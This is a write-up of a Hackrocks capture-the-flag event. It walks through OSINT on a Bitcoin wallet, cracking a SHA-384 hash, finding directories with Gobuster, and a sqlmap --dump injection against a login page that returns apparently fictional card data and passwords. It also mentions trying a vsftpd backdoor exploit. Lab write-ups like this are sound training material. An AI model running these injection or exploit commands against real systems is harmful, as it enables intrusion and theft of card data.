Pwnverse CTF Writeup


I recently participated in a CTF created by Pwnverse and sponsored by Hackrocks. It contained 4 tiers with 2 challenges each.
Tiers were categorized by: Newbie (1,2), Easy (3,4), Medium (5,6), and Hard (7,8).
After completing 4 of these challenges successfully, I managed to secure 39th rank with a total of 155 points.

So without further ado let’s see what these challenges were & how I tackled them.

1. Corrupt Committee:-

Description: Our investigation team has discovered that some senior officials of a certain Olympic Committee have received significant bribes in the past, specifically in 2012. Unfortunately, we do not know much more; we only have the following image for you to start your investigation, which is somehow related to the recipient of the payment. Regarding the amount of the payment, we only know that it must be significantly higher than the rest of the payments received that year.

Can you help us bring the guilty parties to justice?

(The token of this challenge will be the identifier of the payers)

SOLUTION: The challenge gave a QR code which decoded to “1BWaryNxvEdkzRMZ6L4y2bgvBwhRyFTHQ2”. Since this was a payment challenge, my mind went straight to cryptocurrency. I searched this string on Blockchain.com and got 2 linked wallets. After filtering the wallet’s Bitcoin transactions by the year 2012, I got:

Fee 0.00000000 BTC (0.000 sat/B — 0.000 sat/WU — 258 bytes) +10.00000000 BTC
Hash b8d6559c52ad2c3137151a6eb091729d6d104e21a688549dc2a8557ab5e156b2: 2012-09-30 16:19
1Ce1DeJf6HHHKPBKH63qC7kzP6m2a3rDrr: 51.41448112 BTC
18nbMfiKjucUhs7tps6G8NGziPwK2MX9aZ: 41.41448112 BTC
1BWaryNxvEdkzRMZ6L4y2bgvBwhRyFTHQ2: 10.00000000 BTC

After entering the wallet address “1Ce1DeJf6HHHKPBKH63qC7kzP6m2a3rDrr” (the input side of that transaction, i.e. the payer) I pwned the 1st challenge.

2. Metaverse Cracking:-

Description: Do you like the metaverse, the NFTs, and cryptography, and would you like to help Juan earn money through a bug?

This is your challenge!

Not long ago Juan downloaded an NFT game with the idea of starting to earn cryptocurrencies. The game caught his attention because of the dynamics it followed.

The game consists of the following:

Random encrypted passwords are generated every day and the player can crack as many as he can and wants, as long as he has energy left. A user has 5 energy points per day, and for each play (hash detection attempt plus password cracking) 0.5 points are lost, i.e. the user has a total of 10 plays.
The interface is very simple: it consists of a screen with padlock cards and a brief description of how difficult or improbable it is to crack the generated password. The user chooses which padlock to attack, i.e. which password he wants to crack. Once he has chosen it, he clicks on the Crack button. Once this is done, the program returns on screen the hash and/or the password if it has been obtained along with two fields where the user must enter what has been obtained and press the Solve button.

The benefits that the player can get are:

Between 0.00008 ETH and 0.00021 ETH if the hash is successfully detected.
Between 0.00042 ETH and an additional 0.0012 ETH if the password is cracked.

To play the game you need a set of tools integrated into the game which are obtained by purchasing boxes. The 4 available boxes are:

demo (Free): contains a tool with 20% hash detection and 15% cracking probability.
Basic: contains a tool with 50% password hash detection probability and 25% cracking probability.
The intermediate: contains a tool with a hash detection probability of 80% and a cracking probability of 50%.
The pro: contains two separate tools, one with 100% hash detection and the other with 95% cracking probability. In other words, the pro provides two specialized tools that almost ensure profit.

If you buy, for example, the basic box and then the pro, the game detects you as if you had only the pro box, that is, bonuses are not accumulated, but it keeps the ones from the last purchased box.

Juan does not know very well if it is profitable to invest or not in the game, but before jumping to buy any box, he decides to try the demo that is free. After two plays he detects a bug in the game, and that is that the game calculates and displays the type of hash and the encrypted password before the user clicks on the Decrypt button.

Juan doesn’t understand much about cryptography, but he knows that there are tools (outside the game) to detect hashes and break passwords, so he asks you to help him crack one of the hardest passwords the game has thrown at him so far.

The information Juan saw on his screen was:

sha384

73a32b396debcb88809e534a6257ff32a67e70a0663740f538969c7741dfece93309f0dce80d57924602423cf8d3e0b9

Will you be able to make Juan earn some money? Help him crack the password in Clear, as well as the profit (in ETH) if he gets the maximum prize (express to 5 decimal places).

The token must be in the following format: counter-crypt-prize

Example answer: premio-3'21248

SOLUTION: Since everything was already given here, including the hash and the algorithm, all that was left to do was crack it. I used “https://crackstation.net”, which gave me “premio”. For the 2nd part of the token, I simply added the highest benefits, i.e., “0.00021 + 0.0012”, and entered the answer in the format “premio-0'00141”. I didn’t expect it to work, but surprisingly it did.
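As an added illustration (my own code, not part of the CTF or of the original solution), the script below reproduces both halves of the answer offline: it hashes a constructed toy wordlist with the algorithm the game displayed and compares each digest with the one on Juan’s screen, then assembles the token from the maximum payouts. The wordlist contents and the helper names are assumptions.

```python
import hashlib
from decimal import Decimal
from typing import Iterable, Optional

# Algorithm and digest exactly as shown on Juan's screen (from the challenge text).
TARGET_ALGO = "sha384"
TARGET_HASH = ("73a32b396debcb88809e534a6257ff32a67e70a0663740f538969c7741dfece9"
               "3309f0dce80d57924602423cf8d3e0b9")

# Constructed toy wordlist for this example; a real attempt would use a full list.
WORDLIST = ["password", "metaverso", "premio", "juan"]


def digest_hex(algo: str, text: str) -> str:
    """Hex digest of `text` under the named hashlib algorithm (e.g. 'sha384')."""
    if algo not in hashlib.algorithms_available:
        raise ValueError(f"unsupported hash algorithm: {algo}")
    return hashlib.new(algo, text.encode("utf-8")).hexdigest()


def find_preimage(algo: str, target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose digest equals target_hex, else None."""
    target_hex = target_hex.lower()
    for candidate in wordlist:
        if digest_hex(algo, candidate) == target_hex:
            return candidate
    return None


def max_prize_eth(hash_max: str = "0.00021", crack_max: str = "0.0012") -> str:
    """Best-case payout: max hash-detection prize plus max cracking prize, 5 decimals."""
    return f"{Decimal(hash_max) + Decimal(crack_max):.5f}"


def build_token(password: str, prize_eth: str) -> str:
    """counter-crypt-prize format, with the apostrophe used as decimal mark in the example answer."""
    return f"{password}-{prize_eth.replace('.', chr(39))}"


if __name__ == "__main__":
    word = find_preimage(TARGET_ALGO, TARGET_HASH, WORDLIST)
    print("cracked:", word)
    if word:
        print("token:", build_token(word, max_prize_eth()))
```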

3. LeChuck is back:-

Description: Where could they have started? Your instinct warns you: LeChuck has a big ego, and he’s probably left his signature somewhere on your site.

Is it that easy? Bingo! Something pops up at that URL https://challenges.hackrocks.com/lechuck
Look
for LeChuck’s footprints to move on!

SOLUTION: Since this was a website, I used /usr/share/wordlists/dirb/common.txt to look for any exposed endpoints. For some reason the first two attempts with Dirb failed; however, with Gobuster I discovered an open one, “https://challenges.hackrocks.com/lechuck/user”, which said, “To get info about a user, use the syntax: /user/<username>”.

After this, it was simply including “lechuck” as the username and getting the flag “lechuck,{flag}MBZICNIBRM”.

4. Simon a Successful Streamer:-

Description: That’s right, Simon Runbott has lost access to his bitcoins. He was storing them on an old Linux computer, which he has completely forgotten the password to access. At least he managed to send us a password file, which he hopes will help.

Can you recover Simon’s password?
Password hash: “simon:$6$ephwDW/dO/YUIRFq$4MtdliecaYjJ4dKIqbBbX3SsT8mebY3tdb6UdR0qMZk..0sgt7SjGQlhY/xiLLnzkaIB4gYb5lY./:18760:0:99999:7:::”

SOLUTION: I did find an account on Instagram, “simon.runbott”, and managed to extract some keywords (“Audi, RTBB221, Cat, Django, 2018”); however, by the time I went back to try them the CTF had ended. So this challenge was not completed.

5. Attacking The Bad Guy:-

Description: Not all cybercriminals secure their communications or methods, so they can be tracked and sometimes even compromise their services.

In this case, “the bad guy” left a trace on his website, and you will have to break it to verify if your customer’s data is stored on it. Do you dare to hack the “hacker”?

In the last couple of days, tickets have been received from our customers notifying and claiming money for purchases that they have not made, but both on our website and on other sites, that is, users are receiving unrequited money charges.

All of them agree that these charges are made after having made a purchase in our store. Following this rare occurrence, we called in our Blue Team to investigate the case. After reviewing both the logs and the web code, they managed to find a third-party library that captured the information of the bank cards as well as their CVV and expiration date. Additionally, analyzing said library they found the website to which the data was being sent, but they found a login, and this team is not specialized in attacks of this style, so they request your help: investigate said website, obtain access and check if the stored data is there, and more specifically the data of Adrián Pérez Ríos, since he is an important buyer.

The challenge token will be: Adrián Pérez Ríos’s passwordadmin-numcard-cvv-expiredate or 0000000000-123-12/22 if it is not present.

Response example: admin12-4548812049400004-203-08/27
To access the challenge, click on the following link: https://challenges.hackrocks.com/bad-guy

SOLUTION: Since this one included a login portal, it was time to bring out the big guns. I used Burp Suite to intercept a login request, “https://challenges.hackrocks.com/bad-guy/?username=asdfgh&password=asdfgh&login=Are+you+sure%3f”, and passed it to sqlmap with the syntax: sqlmap -u "https://challenges.hackrocks.com/bad-guy/?username=asdfgh&password=asdfgh&login=Are+you+sure%3f" --dump
This dumped two tables:
Database: filtrados
Table: cuentas
[10 entries]
+----+-----+------------------+-----------+-----------------------+------------------+
| id | cvv | name             | fecha_cad | last_name             | num_cuenta       |
+----+-----+------------------+-----------+-----------------------+------------------+
| 1  | 100 | Mariola          | 05/26     | Benítez Madroñal      | 2683393655746243 |
| 2  | 321 | Claus            | 03/24     | Grande Sanchez        | 4866928395393289 |
| 3  | 345 | Imanol           | 08/23     | Zabala                | 4834966576322339 |
| 4  | 456 | María            | 09/22     | Castañeda León        | 6232573332859554 |
| 5  | 879 | Adrián           | 07/25     | Pérez Ríos            | 6269784865499645 |
| 6  | 20  | Francisco Javier | 02/26     | Sánchez Puente        | 6478497458632956 |
| 7  | 107 | Mariola          | 02/23     | Benítez de la Herranz | 4593769667235535 |
| 8  | 589 | Pepe             | 06/24     | Rodríguez Escobar     | 4982832873926876 |
| 9  | 986 | Jonathan         | 04/23     | Garcia Soria          | 7626334895889925 |
| 10 | 345 | Miguel Ángel     | 05/23     | de los Santos Torres  | 5633443968477687 |
+----+-----+------------------+-----------+-----------------------+------------------+

Database: filtrados
Table: usuarios
[2 entries]
+------+-------+--------------------+
| id_u | usu   | contra             |
+------+-------+--------------------+
| 1    | admin | 123456789987654321 |
| 2    | usu   | 1234678            |
+------+-------+--------------------+

Now, as per the given format (“Response example: admin12-4548812049400004-203-08/27”), I entered “123456789987654321-6269784865499645-879-07/25” and voilà, Bad guy pwned. One thing I would mention: in a real pentest or a production environment I would never have used sqlmap this recklessly, as it might have caused serious disruption.
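As an added illustration (my own code, not the challenge site’s), here is the shape of the flaw sqlmap exploited beside the fix: a login query built by string interpolation, and the same query with bound parameters, both run against a constructed in-memory copy of the usuarios table. The dump also exposes a second defect worth noting, passwords stored in clear text instead of as salted hashes.

```python
import sqlite3

# Constructed in-memory stand-in for the dumped "usuarios" table (values from the dump above).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usuarios (id_u INTEGER, usu TEXT, contra TEXT)")
    conn.executemany(
        "INSERT INTO usuarios VALUES (?, ?, ?)",
        [(1, "admin", "123456789987654321"), (2, "usu", "1234678")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Login check built by string interpolation: user input is parsed as SQL syntax."""
    sql = (f"SELECT id_u FROM usuarios WHERE usu = '{username}' "
           f"AND contra = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the input stays data, whatever characters it contains."""
    sql = "SELECT id_u FROM usuarios WHERE usu = ? AND contra = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(username: str, password: str) -> dict:
    """Evaluate one username/password pair against both implementations."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }


if __name__ == "__main__":
    print("valid credentials:", compare("admin", "123456789987654321"))
    # A tautology in the password field only satisfies the string-built query.
    print("tautology in password field:", compare("asdfgh", "' OR '1'='1"))
```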

6. The Final Countdown:-

Description: Did you know that we at hackrocks have launched our own space program? In fact, we have decided to compete with Elon Musk and our ultimate goal is to reach Mars! Why not? :).

But for now, first stop, the moon. And we have already started with setbacks. Possibly due to the action of cosmic radiation, the countdown to the emergency launch of the module back to Earth has started. Unless our pilots can stop it in time, it will inevitably take off, whether they are on board or not.

As part of the ground crew, can you help them?

For security, this code is changed every few seconds. The commander has a hardware device, similar to an RSA key, which generates an OTP from the current code. However, the commander has lost it, and we don’t have time to send him another one!

File:RSA-SecurID-Token.jpg — Wikimedia Commons

Will you be able to stop the countdown by providing the next valid code after the current one at some point in time?
To access the challenge, click on the following link: https://challenges.hackrocks.com/launch-code/

SOLUTION: I looked at the website once and took a rain check.

7. FTPing:-

Description: You should already know that, in the hacker universe, nothing is what it seems, nor is it where it should be. In this challenge you will have to face a lonely machine, which will not easily reveal its secrets to you. Ready to accept the challenge?

Of course, getting the token will not be easy at all. You will have to use different techniques, and chain several of them together. So enough chitchat for now.

Your target? The next machine:
assembly.hackrocks.com
Good luck!

SOLUTION: This challenge remained unsolved; however, it was a very interesting one, as I managed to uncover some juicy details. Nonetheless, it was a dead end.
Details are as follows:
Domain = assembly.hackrocks.com
IP = 23.88.100.109
Hostname = static.109.100.88.23.clients.your-server.de
Operating System = Ubuntu 20.04
Open Ports = 22 (SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3) & 2121 (vsFTPd 2.3.4)
I said interesting because this particular version of vsftpd has a well-known “Backdoor Command Execution” vulnerability, which seemed to be patched here. I tried multiple exploits, including the one available in Metasploit, to no avail.

8. Santa Claus has Disappeared:-

Description: Santa Claus has been kidnapped! Christmas is in danger!

Of course, you cannot remain impassive, help us! The problem is that we only have a network traffic capture that, we are sure, has been generated by Santa.

In this challenge:
You must find the geographic location of Santa.
You will learn to analyze traffic captures.
You must exercise your analytical and abstraction skills.

It’s terrible, Santa Claus has disappeared. Our agents suspect that The Grinch is behind this kidnapping. But, as always, it won’t be easy for us to find him. The only thing we have achieved is a traffic capture, obtained from a wireless interface, which we know has been generated by Santa himself to request help.

By the way, our little helpers inform us that the token to overcome this challenge will be Santa’s geographic location.

Ready to start?

SOLUTION: This challenge was not solved, however here is my analysis.
The PCAP file had some very interesting data, and I managed to extract Santa’s private IP (192.168.1.84). This IP led me to some MAC addresses (80:78:71:8e:91:d0, c8:09:a8:75:14:b7) and IPs (95.216.99.248, 20.190.129.100, 52.113.205.16, 157.245.220.120). I also saw some searches made over port 80 (help, how to make gorg, how to open locked doors, what is Stockholm syndrome). I tried entering Stockholm, as that is a city, but it wasn’t the right answer.

I believe that with more time on my hands at least 2 other challenges could have been solved. Nonetheless, this CTF served as a nice break, and I am looking forward to participating next year as well.